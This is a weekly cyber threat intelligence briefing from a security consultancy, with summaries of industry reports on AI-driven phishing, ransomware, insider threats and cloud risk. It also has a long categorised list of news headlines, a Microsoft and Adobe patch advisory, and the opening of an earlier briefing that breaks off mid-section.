A recent report has found that phishing attacks increased by 28% between the first and second quarters of 2024. Of the phishing kits used, 75% leveraged artificial intelligence and 82% incorporated deepfake capabilities. 44% of the attacks between April and June exploited compromised email accounts, with 8% originating from supply chain accounts. Hyperlinks were identified as the most common attack payload, followed by attachments. The report highlighted that attackers' use of AI in phishing toolkits lowers the barrier to entry for cyber attacks. It emphasised the need for organisations to adopt advanced AI defences without introducing new vulnerabilities by using AI unnecessarily.
AI is Most Serious Threat to Orgs, According to Security Professionals
Keeper Security has found that AI-driven cyber threats are now the most serious concern for organisations, with 51% of security leaders identifying them as such. Despite 81% of organisations implementing AI usage policies and 77% of leaders being familiar with AI security best practices, 35% feel least prepared to combat AI-powered attacks compared to other cyber threats. The survey also highlighted that 84% of IT and security leaders find AI-powered tools have made phishing and smishing attacks harder to detect. Organisations are prioritising data encryption, employee training, and advanced threat detection systems to counter these evolving threats.
MI5 Chief Warns of Cyber Threats to the UK
MI5 has warned that cyber threats from Russia, China, and Iran are a growing concern for the UK. Director General Ken McCallum highlighted that these nations are heavily investing in human intelligence and advanced cyber operations targeting government information, technology, and democratic institutions. Despite expelling over 750 Russian diplomats since early 2022—the majority being spies—cyber espionage activities have intensified. MI5 and the National Cyber Security Centre anticipate increased cyber attacks on Western cyber defences, particularly from Russian state actors. McCallum also emphasised the distinct threat posed by China, urging a comprehensive response to build resilience.
Walking the Tightrope Between Innovation and Risk
A recent analysis revealed that early engagement with CISOs in innovation projects leads to proactive security measures, building trust and ensuring innovation and security can coexist. Interestingly, organisations using older operational systems were shielded from recent security incidents, highlighting the inevitable trade-off between innovation and risk. The report suggests reframing the conversation to 'secure innovation' and emphasises fostering a security-first culture where employees are the first line of defence. Additionally, it stresses the importance of ensuring third-party vendors are secure, as a single compromised user could trigger a company-wide incident.
Ransomware Severity Up 68% in First Half of 2024
Cyber insurer Coalition has found that while cyber insurance claims frequency decreased slightly in the first half of 2024, ransomware severity surged by 68%, with average losses per incident reaching $353,000. Businesses with over $100 million in revenue saw a 140% increase in claims severity, averaging losses of $307,000. Ransomware, though accounting for 18% of claims, heavily drove overall severity. The report also highlighted that 40% of policyholders paid ransom demands. Additionally, organisations using outdated technologies were 2.5 times more likely to experience a claim, underscoring the need for updated security measures.
31 New Ransomware Groups in 12 Months
There has been a 30% increase in active ransomware groups over the past year, with 31 new ransomware groups identified in the last twelve months. Despite intensified law enforcement efforts, the ransomware landscape has become more fragmented. LockBit remained the most active group, accounting for 17% of victims but down 8% from the previous year due to law enforcement operations. The cyber criminal group Play doubled its victim count to become the second most active, while newcomer RansomHub accounted for 7%.
Lack of Cyber Risk Quantification Leaves Companies Financially Exposed: PwC Report
PwC's latest report reveals a significant gap in how organisations quantify cyber risks financially. Despite 89% of executives agreeing on the importance of measuring cyber risk for investment prioritisation, only 15% effectively do so. This disconnect leaves many companies financially vulnerable, with only 21% allocating cyber budgets to top risks. While 77% of executives expect cyber security budgets to increase next year, without proper quantification, funds may not address the most pressing threats. The report highlights that over half of executives see cyber security as a differentiator influencing customer trust and brand loyalty, yet a lack of effective measurement persists.
Software Supply Chain Weaknesses are Increasingly Putting Businesses at Risk
BlackBerry reports that software supply chain weaknesses are increasingly putting businesses at risk of cyber attacks, with 51% of UK IT leaders receiving notifications of attacks or vulnerabilities in the past year. Despite this, 58% trust their suppliers' cyber security policies are comparable or stronger than their own, yet less than half requested compliance confirmations. Additionally, 51% found unknown participants in their software supply chain. The consequences are significant: 71% suffered financial loss, 67% faced data and reputational damage, and 42% took over a week to recover from such attacks.
UK Businesses Cite Economic Risks and Cyber Crime as Top 2024 Concerns: Marsh McLennan
Marsh McLennan has found that economic risks and financial challenges are the top concern for UK businesses over the next 12 months, with 43% of leaders citing these issues. Cyber threats take the number two spot, where the sharp rise in attacks is seen as a growing concern, jumping from 20% in 2023 to 39% in 2024. The report highlights that business leaders plan to prioritise strengthening cyber security measures, including assessing supply chain risks and customer relationships.
Cloud Security Risks Surge as 38% of Firms Face Exposures
Cloud security risks are surging, with 38% of organisations globally facing critical exposures from a combination of security gaps. These security concerns intensify due to the "toxic cloud triad" of publicly exposed, critically vulnerable, and highly privileged cloud workloads, leaving firms vulnerable to cyber attacks resulting in disruptions, system takeovers, and data breaches. Despite the average cost of a data breach in 2024 nearing $5 million, many organisations have misconfigurations and excessive permissions; 84% possess unused or long-standing access keys; and 74% have publicly exposed storage.
Insider Threat Damage Balloons as Visibility Gaps Widen
Recent research indicates that insider threats have led to a sharp increase in cyber attacks, with 83% of organisations experiencing such incidents in 2024, up from 60% the previous year. The growing complexity of IT systems and the adoption of technologies like AI and cloud services are creating visibility gaps and escalating risks. Nearly half of the organisations reported more frequent insider attacks, with remediation costs ranging from $100,000 to $2 million per incident. Additionally, 45% take a week or longer to recover, underscoring the need for improved policies, staff training, and advanced incident-response solutions.
Sources:
https://www.darkreading.com/cyberattacks-data-breaches/it-systems-being-attacked-prepared
https://www.infosecurity-magazine.com/news/boardciso-mismatch-on-cyber/
https://www.msspalert.com/brief/mounting-phishing-attacks-enabled-by-ai-deepfakes
https://www.inforisktoday.com/mi5-chief-warns-cyberthreats-to-uk-a-26483
https://www.darkreading.com/vulnerabilities-threats/walking-tightrope-innovation-risk
https://www.infosecurity-magazine.com/news/new-ransomware-groups-emerge-2024/
https://www.infosecurity-magazine.com/news/cloud-security-risks-surge-38/
Governance, Risk and Compliance
Board-CISO Mismatch on Cyber Responsibility - Infosecurity Magazine (infosecurity-magazine.com)
Walking the Tightrope Between Innovation & Risk (darkreading.com)
Warning over cyber security gap in the HR sector | theHRD (thehrdirector.com)
Your IT Systems Are Being Attacked. Are You Prepared? (darkreading.com)
US CISO Compensation on the Rise, Report Finds | MSSP Alert
45% of cyber security leaders are stressed about budget restraints | Security Magazine
The three qualities modern CISOs must have today to succeed | SC Media (scworld.com)
CISO Paychecks: Worth the Growing Security Headaches? (darkreading.com)
From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)
Organisations are taking action towards cyber resilience: PwC - Reinsurance News
Cyber risk advice for boards | Professional Security Magazine
How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online
Chief risk storyteller: How CISOs are developing yet another skill | CSO Online
Ex-Uber CISO Requests New, 'Fair' Trial (darkreading.com)
Cultivating a security-first mindset: Key leadership actions - Help Net Security
What is OPSEC (operations security)? | Definition from TechTarget
Widening talent pool in cyber with on-demand contractors - Help Net Security
Cyber Accountability Building • Stimson Center
Facts and Stats about Cyber Security and Compliance - Security Boulevard
Many C-suite execs have lost confidence in IT, including CIOs | CIO
Threats
Ransomware, Extortion and Destructive Attacks
Why evolving cyber threats mean small businesses are ransomware targets – Computerworld
Secureworks: Ransomware takedowns didn’t put off cyber criminals | Computer Weekly
Guidance for ransomware incidents | Professional Security Magazine
Ransomware double-extortion group listings peaked in 2024, report finds | SC Media (scworld.com)
Criminals Are Testing Their Ransomware in Africa (darkreading.com)
Homeland Security Blocked 500+ Ransomware Attacks Since 2021 (pymnts.com)
US agency warns against crypto-hungry Trinity ransomware (cointelegraph.com)
Hackers Exploiting Veeam RCE Vulnerability to Deploy Ransomware (cybersecuritynews.com)
Ransomware Victims
Study: 92% of Healthcare Firms Hit by Cyber Attacks This Year (inforisktoday.com)
American Water shut down some of its systems following a cyber attack (securityaffairs.com)
Casio reports IT systems failure after weekend network breach (bleepingcomputer.com)
Credit monitoring and supply chain risk company hacked | CyberScoop
Medical Group Pays $240K Fine for 3 Ransomware Attacks (govinfosecurity.com)
MoneyGram: No evidence ransomware is behind recent cyber attack (bleepingcomputer.com)
Cyber expert suggests American Water cyber incident was a ransomware attack | ITPro
Phishing & Email Based Attacks
Mounting Phishing Attacks Enabled by AI, Deepfakes | MSSP Alert
Commodity and Bulk Phishing Attacks See Huge Rise | SC Media UK (scmagazineuk.com)
Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)
Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews
Mamba 2FA Cyber Crime Kit Strikes Microsoft Users (darkreading.com)
9 types of phishing attacks and how to identify them | CSO Online
Microsoft 365 accounts targeted by dangerous new phishing scam | TechRadar
62% of observed finance domains involved in phishing attacks | Security Magazine
Scarlett Johansson tops McAfee 2024 Celebrity Hacker Hotlist (betanews.com)
Despite Online Threats, Users Aren’t Changing Behavior (darkreading.com)
Today’s “Good Enough MFA” Should Be Phishing-Resistant - Security Boulevard
OpenAI says Chinese gang tried to phish its staff • The Register
Hurricane Helene exploited in FEMA scams, phishing | SC Media (scworld.com)
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)
Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews
9 types of phishing attacks and how to identify them | CSO Online
Other Social Engineering
9 types of phishing attacks and how to identify them | CSO Online
To Deliver Malware, Attackers Use the Phone | Intel 471
Despite Online Threats, Users Aren’t Changing Behavior (darkreading.com)
Scarlett Johansson tops McAfee 2024 Celebrity Hacker Hotlist (betanews.com)
Hurricane Helene exploited in FEMA scams, phishing | SC Media (scworld.com)
Attackers Using VSCode to Remotely Compromise Systems | MSSP Alert
Artificial Intelligence
42.5% of fraud attempts are now driven by AI - TechCentral.ie
AI anxiety afflicts 90% of consumers and businesses - see what worries them most | ZDNET
AI Most Serious Threat to Orgs, According to Security Professionals - IT Security Guru
Mounting Phishing Attacks Enabled by AI, Deepfakes | MSSP Alert
Three key strategies for organisations to protect themselves from deepfakes - IT Security Guru
OpenAI details how threat actors are abusing ChatGPT | TechTarget
Hacked ‘AI Girlfriend’ Data Shows Prompts Describing Child Sexual Abuse (404media.co)
Risk Strategies Drawn From the EU AI Act (darkreading.com)
2FA/MFA
Today’s “Good Enough MFA” Should Be Phishing-Resistant - Security Boulevard
Why are we still talking about cyber security basics after all these years? - Security Boulevard
Malware
How Malware is Evolving: Sandbox Evasion and Brand Impersonation - Security Boulevard
Ukrainian pleads guilty to operating Raccoon Stealer malware (bleepingcomputer.com)
Malicious Chrome Add-ons Evade Google's Updated Security (darkreading.com)
To Deliver Malware, Attackers Use the Phone | Intel 471
Two never-before-seen tools, from same group, infect air-gapped devices - Ars Technica
The “Mongolian Skimmer” Uses Unicode To Conceal Its Malicious Intent (informationsecuritybuzz.com)
Malicious packages in open-source repositories are surging | CyberScoop
Crypto-stealing malware campaign infects 28,000 people (bleepingcomputer.com)
How macOS malware works and how to secure your Mac
Attackers Using VSCode to Remotely Compromise Systems | MSSP Alert
Bots/Botnets
New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries (thehackernews.com)
Vulnerable APIs and Bot Attacks Costing Businesses Up to $186 Billion Annually (thehackernews.com)
Websites are losing the fight against bot attacks - Help Net Security
Unseen Threats: 95% of Advanced Bots Escape Detection on Websites | HackerNoon
Why Web Application Firewalls Are an Indispensable Part of the Security Stack (thefastmode.com)
Gorilla Botnet Launches Over 300,000 DDoS Attacks (informationsecuritybuzz.com)
Mobile
Apple iOS 18.0.1 and iPadOS 18.0.1 fix media session and passwords bugs (securityaffairs.com)
This Trojan disguises as Google Chrome or NordVPN to wipe out your accounts | Cybernews
Android 16 could let you lock your phone down even tighter with new security features | TechRadar
Google officially kicks Kaspersky antivirus software app off the Play Store | TechRadar
Google brings better bricking to Androids, to curtail crims • The Register
3 iPhone settings I changed to thwart thieves - and what to do if your phone is stolen | ZDNET
Don’t use iPhone Mirroring at work, experts warn • The Register
Denial of Service/DoS/DDoS
Cloudflare Thwarts Largest-Ever 3.8 Tbps DDoS Attack Targeting Global Sectors (thehackernews.com)
New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries (thehackernews.com)
DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar
Internet of Things – IoT
How smart TVs spy on you and harvest data • The Register
You Need a Separate Network To Protect Yourself From Your Smart Devices (howtogeek.com)
New EU law touts strict cyber security requirements for all connected and IoT devices | Cybernews
14,000 medical devices are online, unsecured and vulnerable | CyberScoop
Data Breaches/Leaks
National Public Data files for bankruptcy after info leak • The Register
90% of Successful Attacks Result in Leaked Data (darkreading.com)
MoneyGram says hackers stole customers' personal information and transaction data | TechCrunch
Internet Archive hacked, data breach impacts 31 million users (bleepingcomputer.com)
Marriott settles for $52M after years-long breaches • The Register
Comcast confirms 237K affected in feisty breach notification • The Register
ADT discloses second breach in 2 months, hacked via stolen credentials (bleepingcomputer.com)
MoneyGram Breach: Social Security Numbers, Bank Account Details Looted (pcmag.com)
FCC Fines T-Mobile $31.5 Million After Carrier Was Hacked 8 Times In 5 Years | Techdirt
Major breach exposes every Dutch police officer: state-sponsored actor suspected | Cybernews
Leaked documents reveal British military’s secret assistance to Israeli army | Al Bawaba
Data loss incidents impact patient care - Help Net Security
Organised Crime & Criminal Actors
British man arrested over hack-to-trade scheme using email password resets | ITPro
Cyber crime and harm - POST (parliament.uk)
Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Lego's website was hacked to promote a crypto scam (engadget.com)
Crypto-stealing malware campaign infects 28,000 people (bleepingcomputer.com)
Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)
FBI created a crypto token so it could watch it being abused • The Register
US agency warns against crypto-hungry Trinity ransomware (cointelegraph.com)
Insider Risk and Insider Threats
Insider Threat Damage Balloons as Visibility Gaps Widen (darkreading.com)
Despite Online Threats, Users Aren’t Changing Behaviour (darkreading.com)
Insurance
Severity of Ransomware Attacks Rose 68% in First Half of 2024, Report Shows (claimsjournal.com)
Cyber insurance demand to rise as new threats emerge, says Bloomberg Intelligence - Reinsurance News
How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online
Supply Chain and Third Parties
Software supply chain weaknesses are increasingly putting businesses at risk | TechRadar
The CrowdStrike bug and the risk of cascading failures - SiliconANGLE
What The SolarWinds Case Means For CISOs And Corporate Cyber Security (forbes.com)
Credit monitoring and supply chain risk company hacked | CyberScoop
Cloud/SaaS
Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)
Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews
Mamba 2FA Cyber Crime Kit Strikes Microsoft Users (darkreading.com)
Cloud Security Challenges in the Modern Era - Compare the Cloud
Hackers still prefer credentials-based techniques in cloud attacks | SC Media (scworld.com)
Microsoft 365 accounts targeted by dangerous new phishing scam | TechRadar
Social Media Accounts: The Weak Link in Organisational SaaS Security (thehackernews.com)
Outages
The CrowdStrike bug and the risk of cascading failures - SiliconANGLE
What The SolarWinds Case Means For CISOs And Corporate Cyber Security (forbes.com)
MoneyGram: No evidence ransomware is behind recent cyber attack (bleepingcomputer.com)
Encryption
Chinese hack shows why Apple is right about security backdoors (9to5mac.com)
The Wiretap: China Has Infiltrated Police Wiretap Systems (forbes.com)
The 30-year-old internet backdoor law that came back to bite | TechCrunch
Massive US security breach highlights danger of weakening encryption | Proton
Linux and Open Source
CUPS could be abused to launch massive DDoS attack • The Register
Malicious packages in open-source repositories are surging | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
There was a 12% increase in brute force cyber attack techniques in 2024 | Security Magazine
This Popular Security Method Doesn't Actually Stop Hackers (makeuseof.com)
Hackers still prefer credentials-based techniques in cloud attacks | SC Media (scworld.com)
Password Basics: Why Mastering Fundamentals Is Crucial (informationsecuritybuzz.com)
Why are we still talking about cyber security basics after all these years? - Security Boulevard
ADT discloses second breach in 2 months, hacked via stolen credentials (bleepingcomputer.com)
Social Media
EU Court Limits Meta's Use of Personal Facebook Data for Targeted Ads (thehackernews.com)
Social Media Accounts: The Weak Link in Organisational SaaS Security (thehackernews.com)
The Social Media Moral Panic Is All About Confusing Risks & Harms | Techdirt
Training, Education and Awareness
Cyber security Is Serious — but It Doesn't Have to Be Boring (darkreading.com)
Regulations, Fines and Legislation
From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)
Marriott settles for $52M after years-long breaches • The Register
Cyber Security and Resilience Bill Update (techuk.org)
UK’s cyber incident reporting law to move forward in 2025 | Computer Weekly
Influential resource on international cyber law updated for 2024 (techxplore.com)
New EU law touts strict cyber security requirements for all connected and IoT devices | Cybernews
How to secure your business before new Cyber Security and Resilience Bill (businesscloud.co.uk)
NIS2 & DORA: Staying ahead of the curve | TechRadar
Risk managers call for EU cyber consistency (emergingrisks.co.uk)
EU retaliates against Russian ‘hybrid warfare’ with new regulations (brusselssignal.eu)
FCC Fines T-Mobile $31.5 Million After Carrier Was Hacked 8 Times In 5 Years | Techdirt
Balancing legal frameworks and enterprise security governance - Help Net Security
Risk Strategies Drawn From the EU AI Act (darkreading.com)
Medical Group Pays $240K Fine for 3 Ransomware Attacks (govinfosecurity.com)
Models, Frameworks and Standards
Meet the shared responsibility model with new CIS resources - Help Net Security
From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)
NIS2 & DORA: Staying ahead of the curve | TechRadar
DORA regulation's nuts and bolts - Help Net Security
Data Protection
Careers, Working in Cyber and Information Security
US CISO Compensation on the Rise, Report Finds | MSSP Alert
Banishing Burnout: Data Security Hangs in Balance in Cyber Wellbeing Crisis - IT Security Guru
CISO Paychecks: Worth the Growing Security Headaches? (darkreading.com)
Widening talent pool in cyber with on-demand contractors - Help Net Security
Imposter syndrome in cyber security | Pen Test Partners
Cyber security careers - BBC News
Career Spotlight: The Growing Demand for OT Security Experts (databreachtoday.co.uk)
6 Simple Steps to Eliminate SOC Analyst Burnout (thehackernews.com)
UK Cyber Team seeks future security professionals | Computer Weekly
Law Enforcement Action and Take Downs
British man arrested over hack-to-trade scheme using email password resets | ITPro
Ukrainian pleads guilty to operating Raccoon Stealer malware (bleepingcomputer.com)
Dutch cops reveal takedown of 'largest dark web market' • The Register
Homeland Security Blocked 500+ Ransomware Attacks Since 2021 (pymnts.com)
UK to Continue Disruptive Actions Targeting Cyber Crime (databreachtoday.co.uk)
Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)
FBI created a crypto token so it could watch it being abused • The Register
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar
Nation State Actors
China
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
The 30-year-old internet backdoor law that came back to bite | TechCrunch
Massive US security breach highlights danger of weakening encryption | Proton
Chinese cyber spies reportedly breached Verizon, AT&T • The Register
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
OpenAI says it has disrupted 20-plus foreign influence networks in past year | CyberScoop
OpenAI says Chinese gang tried to phish its staff • The Register
Russia
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
DOJ seizes 41 Russian-controlled domains in cyber-espionage crackdown | CSO Online
European govt air-gapped systems breached using custom malware (bleepingcomputer.com)
NCSC issues fresh alert over wave of Cozy Bear activity | Computer Weekly
Microsoft: ‘relentless’ Russia-sponsored hacking group has been disrupted - Security - CRN Australia
Russia and Iran want ‘sustained mayhem’ in UK, MI5 warns
Major breach exposes every Dutch police officer: state-sponsored actor suspected | Cybernews
EU retaliates against Russian ‘hybrid warfare’ with new regulations (brusselssignal.eu)
US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (bleepingcomputer.com)
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
Google officially kicks Kaspersky antivirus software app off the Play Store | TechRadar
Pro-Russian cyber attacks hit Belgium for fourth consecutive day (belganewsagency.eu)
Kaspersky says it's closing down its UK office and laying off dozens | TechCrunch
Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday (thehackernews.com)
Cyber Attack Group 'Awaken Likho' Targets Russian Government with Advanced Tools (thehackernews.com)
Iran
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
Russia and Iran want ‘sustained mayhem’ in UK, MI5 warns
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
Earth Simnavaz Levies Advanced Cyber Attacks Against UAE and Gulf Regions | Trend Micro (US)
North Korea
North Korean Hackers Attacking US Organisations With Unique Hacking Tools (cybersecuritynews.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar
Leaked documents reveal British military’s secret assistance to Israeli army | Al Bawaba
What is spyware? And how do you protect yourself from it? | TechRadar
Tools and Controls
MSSP Market News: Survey Shows 62% of SOC Alerts are Ignored | MSSP Alert
How to protect data centres as Critical National Infrastructure (networkingplus.co.uk)
Cyber insurance demand to rise as new threats emerge, says Bloomberg Intelligence - Reinsurance News
45% of cyber security leaders are stressed about budget restraints | Security Magazine
Organisations are taking action towards cyber resilience: PwC - Reinsurance News
How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online
Hackers Exploiting DNS Tunneling Service To Bypass Network Firewalls (cybersecuritynews.com)
Strengthening Cyber Security with NDR and EDR integration - SiliconANGLE
Setting Up Your Network Security? Avoid These 4 Mistakes (techrepublic.com)
Cyber security professionals are turning to AI as more lose control of detection tools | ZDNET
SOC teams are frustrated with their security tools - Help Net Security
Why Web Application Firewalls Are an Indispensable Part of the Security Stack (thefastmode.com)
Cyber security leaders still shaky about post-attack recovery, reports show | Healthcare IT News
How to Get Going with CTEM When You Don't Know Where to Start (thehackernews.com)
Cyber Security Is Serious — but It Doesn't Have to Be Boring (darkreading.com)
Other News
Study: 92% of Healthcare Firms Hit by Cyber Attacks This Year (inforisktoday.com)
Five percent of all Adobe Commerce and Magento stores hacked, researchers say | Cybernews
NCSC celebrates eight years as Horne blows in | Computer Weekly
Cyber security in an age of terror
Almost half of UK higher education institutions experience a cyber attack every week | TechRadar
London Fire Brigade block almost 340,000 cyber attacks (verdict.co.uk)
Healthcare's Grim Cyber Prognosis Requires Security Booster (darkreading.com)
Kaspersky says it's closing down its UK office and laying off dozens | TechCrunch
Building Cyber Resilience in SMBs With Limited Resources (darkreading.com)
Middle East, Turkey See Cyber Threats Rise (darkreading.com)
Modern payment systems: An effective way to reduce your attack surface | ITPro
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
Cyber security tips for barristers, solicitors and legal... - NCSC.GOV.UK
Government launches cyber standard for local authorities | Computer Weekly
Reasons why MSPs are the future | Microscope (computerweekly.com)
Vulnerability Management
Vulnerabilities
Microsoft: Windows 11 22H2 Home and Pro reached end of servicing (bleepingcomputer.com)
CISA says critical Fortinet RCE flaw now exploited in attacks (bleepingcomputer.com)
Hackers Exploiting Veeam RCE Vulnerability to Deploy Ransomware (cybersecuritynews.com)
Five percent of all Adobe Commerce and Magento stores hacked, researchers say | Cybernews
UK telcos including BT at risk from DrayTek router vulnerabilities | Computer Weekly
Critical Apache Avro SDK RCE flaw impacts Java applications (securityaffairs.com)
PoC Exploit Released for Microsoft Office 0-day Flaw - CVE-2024-38200 (cybersecuritynews.com)
Single HTTP Request Can Exploit 6M WordPress Sites (darkreading.com)
Okta Classic customers told to check logs for sign-on bypass | SC Media (scworld.com)
Adobe Releases Security Updates for Multiple Products | CISA
Three new Ivanti CSA zero-day actively exploited in attacks (securityaffairs.com)
US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (bleepingcomputer.com)
VMware NSX Vulnerabilities Allow Hackers To Execute Arbitrary Commands (cybersecuritynews.com)
Researchers discover 14 new DrayTek vulnerabilities | Security Magazine
WordPress LiteSpeed Cache plugin flaw could allow site takeover (securityaffairs.com)
Still running Windows 11 22H2? No more security fixes from Microsoft for you! (betanews.com)
Exploit code for critical GitLab auth bypass flaw released (CVE-2024-45409) - Help Net Security
Firefox Zero-Day Under Attack: Update Your Browser Immediately (thehackernews.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 09 October 2024 – Microsoft and Adobe Security Updates
Black Arrow Cyber Advisory 09 October 2024 – Microsoft Patch Tuesday and Adobe Security Updates
Executive summary
Microsoft’s October Patch Tuesday provides updates to address 117 security issues across its product range, including two actively exploited vulnerabilities and three publicly disclosed bugs. In addition to the Microsoft updates, this week also saw Adobe fix 52 vulnerabilities across various products.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisation’s data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of Windows and all affected Adobe products. The updates should be applied as soon as possible for the actively exploited vulnerabilities and for all other vulnerabilities that have a critical severity rating.
Microsoft
Further details on other specific updates within this Microsoft Patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct
Adobe
Further details of the vulnerabilities in Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Briefing 04 October 2024
Black Arrow Cyber Threat Intelligence Briefing 04 October 2024:
-How Snoozing on Cyber Security Fails Modern Businesses
-Cyber Criminals Capitalise on Poorly Configured Cloud Environments
-90% of Cyber Security Incidents Could Be Avoided, Survey Reveals
-The Cyber Industry Needs to Accept It Can't Eliminate Risk
-Cyber Teams Say They Can’t Keep Up with Attack Volumes
-C-Level Executives are a Weak Point for Cyber Security
-Email Phishing Attacks Surge as Attackers Bypass Security Controls
-Security Threats Are More Pressing Than Ever for Business Leaders, With Cloud Worries Taking Top Spot
-Ten Million Brits Hit by Fraud in Just Three Years
-Is the Weakest Link in Cyber Security Becoming Even Weaker?
-Cyber Incidents are the Achilles Heel for Major UK CEOs, Report Finds
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Top Cyber Stories of the Last Week
How Snoozing on Cyber Security Fails Modern Businesses
A recent study has found that many organisations are delaying crucial data security updates, likened to hitting the snooze button on an alarm. This reluctance to modernise security measures leaves businesses vulnerable to evolving threats as technologies like cloud and AI are integrated into operations. The report highlights that clinging to legacy security systems can lead to significant financial and reputational damage. Despite the ever-present threat of cyber attacks, many organisations hesitate to upgrade due to comfort with existing systems and perceived cost implications. The adoption of modern security practices like Zero Trust models and AI-driven tools is essential to mitigate these risks.
Cyber Criminals Capitalise on Poorly Configured Cloud Environments
According to the 2024 Elastic Global Threat Report, cyber criminals are exploiting poorly configured cloud environments and leveraging off-the-shelf offensive security tools, which account for approximately 54% of observed malware alerts, with one tool responsible for over 27% of infections. Misconfigurations are widespread: 47% of Microsoft Azure failures are tied to storage issues, and 30% of AWS failures result from the lack of multi-factor authentication. There has been a 12% increase in brute-force techniques, particularly in Azure environments. While defence technologies are making progress, the report emphasises the need for enterprises to enhance cloud configurations and enforce security measures like multi-factor authentication.
90% of Cyber Security Incidents Could Be Avoided, Survey Reveals
Veeam Software has found that only 43% of EMEA IT decision-makers believe the forthcoming NIS2 directive will significantly enhance EU cyber security. This scepticism persists despite 90% of respondents reporting at least one security incident in the past year that NIS2 could have prevented. While nearly 80% are confident they will eventually comply with NIS2, up to two-thirds expect to miss the October 2024 deadline. The report highlights barriers to compliance, including technical debt (24%), lack of leadership understanding (23%), and insufficient budget (21%). Additionally, 40% have experienced decreased IT budgets since NIS2 was announced, with many organisations ranking it lower in urgency than other business priorities.
The Cyber Industry Needs to Accept It Can't Eliminate Risk
A recent analysis highlights that striving for zero risk in cyber security is unattainable for organisations. The reliance on large technology providers like CrowdStrike exposes systemic risks, where an incident can have widespread impact across dependent businesses. The article emphasises that instead of pursuing perfection, organisations should focus on reducing risks to a manageable level. Transparency with stakeholders about residual risks is crucial to set realistic expectations and maintain trust. It also suggests diversifying technology stacks to avoid overloading risk onto a few providers, and implementing practical security measures that can be consistently followed to manage risks effectively.
Cyber Teams Say They Can’t Keep Up with Attack Volumes
ISACA has found that understaffing and underfunding are major concerns for cyber security professionals in Europe, with 61% reporting understaffed teams and 52% citing underfunding despite predicted spending increases. The report highlighted that 68% feel their work is more stressful now than in 2019 due to a complex threat landscape. Nearly 58% expect to face a cyber attack in the next 12 months, up six percentage points from 2023. Additionally, 52% pointed to a lack of soft skills among cyber pros, especially communication, exacerbating the skills gap in the industry.
C-Level Executives are a Weak Point for Cyber Security
